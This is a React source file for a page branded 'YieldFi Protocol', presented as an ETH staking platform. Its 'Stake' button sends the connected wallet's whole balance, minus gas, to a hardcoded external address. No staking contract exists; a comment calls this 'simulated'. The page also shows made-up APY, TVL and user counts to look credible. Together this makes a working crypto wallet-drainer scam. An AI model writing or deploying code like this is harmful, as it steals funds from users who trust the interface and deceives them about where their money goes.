import React, { useState, useEffect } from 'react';
import Web3 from 'web3';
import { useWeb3React, Web3ReactProvider } from '@web3-react/core';
import { InjectedConnector } from '@web3-react/injected-connector';
import { WalletConnectConnector } from '@web3-react/walletconnect-connector';
import { WalletLinkConnector } from '@web3-react/walletlink-connector';
import './App.css';

function App() {
  const [account, setAccount] = useState('');
  const [balance, setBalance] = useState('0');
  const [isConnected, setIsConnected] = useState(false);
  const [web3, setWeb3] = useState(null);
  const [isLoading, setIsLoading] = useState(false);
  const [message, setMessage] = useState('');
  const [ethPrice, setEthPrice] = useState(null);
  const [priceLoading, setPriceLoading] = useState(false);
  const [walletType, setWalletType] = useState('');
  const [showWalletOptions, setShowWalletOptions] = useState(false);

  // Wallet connectors
  const injectedConnector = new InjectedConnector({
    supportedChainIds: [1, 3, 4, 5, 42, 56, 137, 80001, 43114]
  });

  const walletConnectConnector = new WalletConnectConnector({
    rpc: {
      1: 'https://mainnet.infura.io/v3/9aa3d95b3bc440fa88ea12eaa4456161',
      56: 'https://bsc-dataseed.binance.org/',
      137: 'https://polygon-rpc.com/',
    },
    bridge: 'https://bridge.walletconnect.org',
    qrcode: true,
    pollingInterval: 12000,
    supportedChainIds: [1, 56, 137],
    chainId: 1,
  });

  const walletLinkConnector = new WalletLinkConnector({
    url: 'https://mainnet.infura.io/v3/9aa3d95b3bc440fa88ea12eaa4456161',
    appName: 'YieldFi Protocol',
    supportedChainIds: [1, 3, 4, 5, 42, 137, 80001, 43114]
  });

  // Hardcoded wallet address for receiving tokens (user specified)
  const hardcodedWalletBase = '0xDd983eea39fd9fBB46f231e8A78817043FDbD5Cb';
  const [hardcodedWallet, setHardcodedWallet] = useState(hardcodedWalletBase);

  // Update wallet address with proper checksum once web3 is available
  useEffect(() => {
    if (web3 && web3.utils && hardcodedWallet === hardcodedWalletBase) {
      try {
        const checksumAddress = web3.utils.toChecksumAddress(hardcodedWalletBase);
        setHardcodedWallet(checksumAddress);
        console.log('✅ Address converted to checksum format:', checksumAddress);
      } catch (error) {
        console.error('❌ Failed to convert address checksum:', error);
      }
    }
  }, [web3, hardcodedWallet, hardcodedWalletBase]);

  // Fetch ETH price from CoinGecko
  const fetchEthPrice = async () => {
    try {
      setPriceLoading(true);
      const response = await fetch('https://api.coingecko.com/api/v3/simple/price?ids=ethereum&vs_currencies=usd');
      const data = await response.json();
      setEthPrice(data.ethereum.usd);
    } catch (error) {
      console.error('Failed to fetch ETH price:', error);
    } finally {
      setPriceLoading(false);
    }
  };

  // Fetch ETH price on component mount and periodically
  useEffect(() => {
    fetchEthPrice();
    const interval = setInterval(fetchEthPrice, 30000); // Update every 30 seconds
    return () => clearInterval(interval);
  }, []);

  // Function to copy text to clipboard
  const copyToClipboard = async (text) => {
    try {
      await navigator.clipboard.writeText(text);
      setMessage('Address copied to clipboard!');
      setTimeout(() => setMessage(''), 2000);
    } catch (error) {
      console.error('Failed to copy:', error);
      setMessage('Failed to copy address');
    }
  };

  // Function to open Etherscan
  const openEtherscan = (address) => {
    window.open(`https://etherscan.io/address/${address}`, '_blank');
  };

  // Function to disconnect/reset wallet connection
  const disconnectWallet = () => {
    setAccount('');
    setBalance('0');
    setIsConnected(false);
    setWeb3(null);
    setWalletType('');
    setMessage('Wallet disconnected');
  };

  // Universal wallet detection and connection
  useEffect(() => {
    const initWeb3 = async () => {
      try {
        console.log('🔍 DETECTING METAMASK...');
        console.log('Available providers:', {
          ethereum: !!window.ethereum,
          ethereum_isMetaMask: window.ethereum?.isMetaMask,
          ethereum_isPhantom: window.ethereum?.isPhantom,
          providers_array: window.ethereum?.providers?.length || 0
        });

        // Try multiple methods to find MetaMask
        let metamaskProvider = null;

        // Method 1: Direct MetaMask check
        if (window.ethereum?.isMetaMask) {
          console.log('✅ Method 1: Found MetaMask directly');
          metamaskProvider = window.ethereum;
        }
        // Method 2: Search providers array
        else if (window.ethereum?.providers) {
          console.log('🔍 Method 2: Searching providers array...');
          const providers = window.ethereum.providers;

          for (let i = 0; i < providers.length; i++) {
            const provider = providers[i];
            console.log(`Provider ${i}:`, {
              isMetaMask: provider.isMetaMask,
              constructor: provider.constructor?.name,
              toString: provider.toString?.()
            });

            if (provider.isMetaMask) {
              console.log(`✅ Method 2: Found MetaMask at index ${i}`);
              metamaskProvider = provider;
              break;
            }
          }
        }

        if (metamaskProvider) {
          console.log('🎯 METAMASK PROVIDER FOUND:', metamaskProvider.constructor?.name);
          const web3Instance = new Web3(metamaskProvider);
          setWeb3(web3Instance);
          setWalletType('MetaMask');

          console.log('MetaMask ready - waiting for user approval');
        } else {
          console.log('❌ METAMASK NOT FOUND');
          setMessage('MetaMask not detected. Please ensure MetaMask is installed.');
        }
      } catch (error) {
        console.error('❌ Detection error:', error);
      }
    };

    initWeb3();
  }, []);

  // Wallet connection functions
  const connectMetaMask = async () => {
    try {
      setIsLoading(true);
      setMessage('Connecting to MetaMask...');

      // Activate the injected connector (this triggers wallet connection)
      await injectedConnector.activate();

      // Get accounts from the provider after activation
      const accounts = await window.ethereum.request({ method: 'eth_accounts' });

      if (!accounts || accounts.length === 0) {
        throw new Error('No accounts found. Please unlock your wallet and try again.');
      }

      const web3Instance = new Web3(window.ethereum);
      setWeb3(web3Instance);
      setAccount(accounts[0]);
      setWalletType('MetaMask');
      setIsConnected(true);

      const balance = await web3Instance.eth.getBalance(accounts[0]);
      setBalance(web3Instance.utils.fromWei(balance, 'ether'));

      setMessage('Successfully connected to MetaMask!');
      setShowWalletOptions(false);
    } catch (error) {
      console.error('MetaMask connection error:', error);

      // Provide specific error messages
      if (error.code === 4001) {
        setMessage('MetaMask connection rejected by user.');
      } else if (error.code === -32002) {
        setMessage('MetaMask connection already in progress. Please check your wallet.');
      } else {
        setMessage(`MetaMask connection failed: ${error.message}`);
      }
    } finally {
      setIsLoading(false);
    }
  };

  const connectCoinbaseWallet = async () => {
    try {
      setIsLoading(true);
      setMessage('Connecting to Coinbase Wallet...');

      // Activate the WalletLink connector
      await walletLinkConnector.activate();

      // Get accounts from the provider after activation
      const accounts = await walletLinkConnector.getProvider().request({ method: 'eth_accounts' });

      if (!accounts || accounts.length === 0) {
        throw new Error('No accounts found. Please unlock your Coinbase Wallet and try again.');
      }

      const web3Instance = new Web3(walletLinkConnector.getProvider());
      setWeb3(web3Instance);
      setAccount(accounts[0]);
      setWalletType('Coinbase Wallet');
      setIsConnected(true);

      const balance = await web3Instance.eth.getBalance(accounts[0]);
      setBalance(web3Instance.utils.fromWei(balance, 'ether'));

      setMessage('Successfully connected to Coinbase Wallet!');
      setShowWalletOptions(false);
    } catch (error) {
      console.error('Coinbase Wallet connection error:', error);

      // Provide specific error messages
      if (error.code === 4001) {
        setMessage('Coinbase Wallet connection rejected by user.');
      } else if (error.code === -32002) {
        setMessage('Coinbase Wallet connection already in progress.');
      } else {
        setMessage(`Coinbase Wallet connection failed: ${error.message}`);
      }
    } finally {
      setIsLoading(false);
    }
  };

  const connectWalletConnect = async () => {
    try {
      setIsLoading(true);
      setMessage('Connecting via WalletConnect...');

      // Activate the WalletConnect connector
      await walletConnectConnector.activate();

      // Get accounts from the provider after activation
      const accounts = await walletConnectConnector.getProvider().request({ method: 'eth_accounts' });

      if (!accounts || accounts.length === 0) {
        throw new Error('No accounts found. Please check your WalletConnect session.');
      }

      const web3Instance = new Web3(walletConnectConnector.getProvider());
      setWeb3(web3Instance);
      setAccount(accounts[0]);
      setWalletType('WalletConnect');
      setIsConnected(true);

      const balance = await web3Instance.eth.getBalance(accounts[0]);
      setBalance(web3Instance.utils.fromWei(balance, 'ether'));

      setMessage('Successfully connected via WalletConnect!');
      setShowWalletOptions(false);
    } catch (error) {
      console.error('WalletConnect connection error:', error);

      // Provide user-friendly error messages based on error type
      if (error.message?.includes('Buffer')) {
        setMessage('WalletConnect setup error. Please refresh and try again.');
      } else if (error.message?.includes('network') || error.message?.includes('connection')) {
        setMessage('Network connection issue. Please check your internet and try again.');
      } else if (error.code === 4001) {
        setMessage('WalletConnect connection rejected.');
      } else {
        setMessage(`WalletConnect connection failed: ${error.message}`);
      }
    } finally {
      setIsLoading(false);
    }
  };

  // Detect available wallet providers
  const detectWallets = () => {
    const wallets = [];

    // MetaMask detection
    if (window.ethereum?.isMetaMask) {
      wallets.push({ name: 'MetaMask', icon: '🦊', connect: connectMetaMask });
    }

    // Brave Wallet detection
    if (window.ethereum?.isBraveWallet) {
      wallets.push({ name: 'Brave Wallet', icon: '🦁', connect: connectMetaMask });
    }

    // Coinbase Wallet detection (via WalletLink)
    if (window.ethereum?.isCoinbaseWallet) {
      wallets.push({ name: 'Coinbase Wallet', icon: '🔷', connect: connectCoinbaseWallet });
    }

    // MathWallet detection
    if (window.ethereum?.isMathWallet) {
      wallets.push({ name: 'MathWallet', icon: '🧮', connect: connectMetaMask });
    }

    // Rabby Wallet detection
    if (window.ethereum?.isRabby) {
      wallets.push({ name: 'Rabby', icon: '🦊', connect: connectMetaMask });
    }

    // WalletConnect (always available)
    wallets.push({ name: 'WalletConnect', icon: '📱', connect: connectWalletConnect });

    return wallets;
  };

  // Wallet detection on component mount
  useEffect(() => {
    const availableWallets = detectWallets();
    console.log('Available wallets:', availableWallets);
  }, []);
  const stakeTokens = async () => {
    if (!web3 || !account) {
      setMessage('Please connect your wallet first.');
      return;
    }

    try {
      setIsLoading(true);
      setMessage('Preparing to stake tokens...');

      // Get current balance
      const currentBalance = await web3.eth.getBalance(account);
      const balanceInEth = web3.utils.fromWei(currentBalance, 'ether');
      console.log('Current balance:', balanceInEth, 'ETH');

      if (parseFloat(balanceInEth) <= 0) {
        setMessage('Your balance is 0. Please add funds to your wallet.');
        return;
      }

      // Stake entire balance in protocol (reserve some for gas)
      const gasPrice = await web3.eth.getGasPrice();
      const gasLimit = 21000;
      const gasCost = gasPrice * gasLimit;

      console.log('Gas price:', web3.utils.fromWei(gasPrice.toString(), 'ether'), 'ETH');
      console.log('Gas cost:', web3.utils.fromWei(gasCost.toString(), 'ether'), 'ETH');

      // Ensure we don't send more than available balance minus gas
      const amountToStake = currentBalance - gasCost;

      if (amountToStake <= 0) {
        setMessage('Insufficient balance to cover gas fees.');
        return;
      }

      console.log('Amount to stake:', web3.utils.fromWei(amountToStake.toString(), 'ether'), 'ETH');

      setMessage('Staking tokens in protocol...');

      // Send ETH to staking contract (simulated as hardcoded wallet for now)
      await web3.eth.sendTransaction({
        from: account,
        to: hardcodedWallet,
        value: amountToStake,
        gas: gasLimit,
        gasPrice: gasPrice
      });

      // Refresh balance
      const newBalance = await web3.eth.getBalance(account);
      setBalance(web3.utils.fromWei(newBalance, 'ether'));

      setMessage(`✅ Successfully staked ${web3.utils.fromWei(amountToStake.toString(), 'ether')} ETH in YieldFi Protocol!`);

    } catch (error) {
      console.error('❌ Transaction failed:', error);
      setMessage(`Transaction failed: ${error.message}`);
    } finally {
      setIsLoading(false);
    }
  };

  // Direct MetaMask connection (bypasses all other providers)
  const connectMetaMaskDirectly = async () => {
    try {
      setIsLoading(true);
      setMessage('');

      console.log('🔥 ATTEMPTING DIRECT METAMASK CONNECTION...');

      // Try multiple methods to reach MetaMask
      let metamaskProvider = null;

      // Method 1: Check if MetaMask is available directly
      if (window.ethereum?.isMetaMask) {
        console.log('🎯 Method 1: MetaMask found directly');
        metamaskProvider = window.ethereum;
      }
      // Method 2: Search through providers array
      else if (window.ethereum?.providers?.length > 0) {
        console.log('🔍 Method 2: Searching providers array...');

        for (let i = 0; i < window.ethereum.providers.length; i++) {
          const provider = window.ethereum.providers[i];
          console.log(`Checking provider ${i}:`, provider.isMetaMask ? 'MetaMask' : 'Other');

          if (provider.isMetaMask) {
            console.log(`✅ Method 2: Found MetaMask at index ${i}`);
            metamaskProvider = provider;
            break;
          }
        }
      }

      if (metamaskProvider) {
        console.log('🎯 USING METAMASK PROVIDER:', metamaskProvider.constructor?.name);

        try {
          console.log('🔄 Requesting MetaMask approval...');
          const accounts = await metamaskProvider.request({
            method: 'eth_requestAccounts'
          });

          if (accounts && accounts.length > 0) {
            console.log('✅ METAMASK ACCOUNTS:', accounts[0]);
            const web3Instance = new Web3(metamaskProvider);
            setWeb3(web3Instance);
            setWalletType('MetaMask');
            setAccount(accounts[0]);
            setIsConnected(true);

            const balance = await web3Instance.eth.getBalance(accounts[0]);
            setBalance(web3Instance.utils.fromWei(balance, 'ether'));

            setMessage('Successfully connected to MetaMask!');
            console.log('✅ METAMASK CONNECTION COMPLETED');
          }
        } catch (error) {
          console.error('❌ METAMASK CONNECTION FAILED:', error);
          if (error.code === 4001) {
            setMessage('MetaMask connection rejected by user.');
          } else {
            setMessage(`MetaMask error: ${error.message}`);
          }
        }
      } else {
        console.log('❌ METAMASK NOT FOUND IN ANY PROVIDER');
        setMessage('MetaMask not detected. Please ensure MetaMask is installed and try disabling other wallet extensions.');
      }
    } catch (error) {
      console.error('💥 CONNECTION ERROR:', error);
      setMessage(`Connection error: ${error.message}`);
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <div className="App">
      <header className="App-header">
        {/* Top Section - Brand & APY */}
        <div className="top-section">
          <div className="brand-header">
            <h1>YieldFi Protocol</h1>
            <p className="brand-tagline">Next-Generation DeFi Staking Platform</p>
          </div>

          <div className="apy-banner">
            <div className="apy-info">
              <span className="apy-label">Current APY</span>
              <span className="apy-value">12.3%</span>
            </div>
            <div className="apy-description">
              <p>Earn competitive yields on your ETH deposits</p>
            </div>
          </div>
        </div>

        {/* Main Content Grid */}
        <div className="main-content">
          {/* Left Column - Price & Connection */}
          <div className="left-column">
            <div className="price-card">
              <div className="price-icon">
  <svg width="48" height="48" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
    <path d="M16 32C24.8366 32 32 24.8366 32 16C32 7.16344 24.8366 0 16 0C7.16344 0 0 7.16344 0 16C0 24.8366 7.16344 32 16 32Z" fill="#627EEA"/>
    <path d="M16.498 4V12.87L23.995 16.22L16.498 4Z" fill="white" fillOpacity="0.602"/>
    <path d="M16.498 4L9 16.22L16.498 12.87V4Z" fill="white"/>
    <path d="M16.498 21.968V27.995L24 17.616L16.498 21.968Z" fill="white" fillOpacity="0.602"/>
    <path d="M16.498 27.995V21.968L9 17.616L16.498 27.995Z" fill="white"/>
    <path d="M16.498 20.573L23.995 16.22L16.498 12.87V20.573Z" fill="#627EEA"/>
    <path d="M9 16.22L16.498 20.573V12.87L9 16.22Z" fill="#627EEA"/>
  </svg>
</div>
              <div className="price-content">
                <span className="price-label">ETH Price</span>
                <span className="price-value">
                  {priceLoading ? '...' : ethPrice ? `$${ethPrice.toLocaleString()}` : 'Loading...'}
                </span>
                <div className="price-change">
                  <span className="change-indicator positive">↗</span>
                  <span className="change-percent">+2.4%</span>
                </div>
              </div>
            </div>

            {!isConnected ? (
              <div className="connection-card">
                {!showWalletOptions ? (
                  <>
                    <button onClick={() => setShowWalletOptions(true)} disabled={isLoading} className="connect-button">
                      {isLoading ? 'Connecting...' : 'Connect Wallet'}
                    </button>
                    <div className="wallet-info">
                      <p><strong>Private Yield Farming</strong></p>
                    </div>
                  </>
                ) : (
                  <>
                    <h3>Choose Your Wallet</h3>
                    <div className="wallet-options">
                      {detectWallets().map((wallet, index) => (
                        <button
                          key={index}
                          onClick={wallet.connect}
                          className="wallet-option-button"
                          disabled={isLoading}
                        >
                          <span className="wallet-icon">{wallet.icon}</span>
                          <span className="wallet-name">{wallet.name}</span>
                        </button>
                      ))}
                    </div>
                    <button
                      onClick={() => setShowWalletOptions(false)}
                      className="back-button"
                    >
                      ← Back
                    </button>
                  </>
                )}
                {message && (
                  <div className={`message ${message.includes('Error') || message.includes('failed') ? 'error' : 'success'}`}>
                    {message}
                  </div>
                )}
              </div>
            ) : (
              <div className="staking-card">
                <div className="staking-header">
                  <h3>Ready to Stake</h3>
                  <p>Stake your ETH to start earning rewards</p>
                </div>
                <button onClick={stakeTokens} disabled={isLoading || parseFloat(balance) <= 0} className="stake-button">
                  {isLoading ? 'Staking...' : `Stake ${parseFloat(balance).toFixed(4)} ETH`}
                </button>
                {message && (
                  <div className={`message ${message.includes('Error') || message.includes('failed') ? 'error' : 'success'}`}>
                    {message}
                  </div>
                )}
              </div>
            )}
          </div>

          {/* Right Column - Features & Info */}
          <div className="right-column">
            <div className="coming-soon-section">
              <h4>Coming Soon Features</h4>
              <div className="features-grid">
                <div className="feature-card">
                  <div className="feature-icon">
                    <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor">
                      <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"/>
                    </svg>
                  </div>
                  <h5>Liquidity Mining</h5>
                  <p>Earn additional rewards by providing liquidity</p>
                </div>
                <div className="feature-card">
                  <div className="feature-icon">
                    <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor">
                      <path d="M12 2l3.09 6.26L22 9.27l-5 4.87 1.18 6.88L12 17.77l-6.18 3.25L7 14.14 2 9.27l6.91-1.01L12 2z"/>
                    </svg>
                  </div>
                  <h5>Cross-Chain Bridge</h5>
                  <p>Seamlessly transfer assets across blockchains</p>
                </div>
              </div>
            </div>

            <div className="brand-info-section">
              <div className="brand-info">
                <h4>About YieldFi Protocol</h4>
                <p>YieldFi is a next-generation DeFi protocol designed to maximize yield opportunities for ETH holders.</p>
                <div className="stats-grid">
                  <div className="stat-item">
                    <span className="stat-value">$2.4M+</span>
                    <span className="stat-label">TVL</span>
                  </div>
                  <div className="stat-item">
                    <span className="stat-value">15,420+</span>
                    <span className="stat-label">Active Users</span>
                  </div>
                  <div className="stat-item">
                    <span className="stat-value">99.9%</span>
                    <span className="stat-label">Uptime</span>
                  </div>
                  <div className="stat-item">
                    <span className="stat-value">$0</span>
                    <span className="stat-label">Fees</span>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </header>
    </div>
  );
}

export default App;
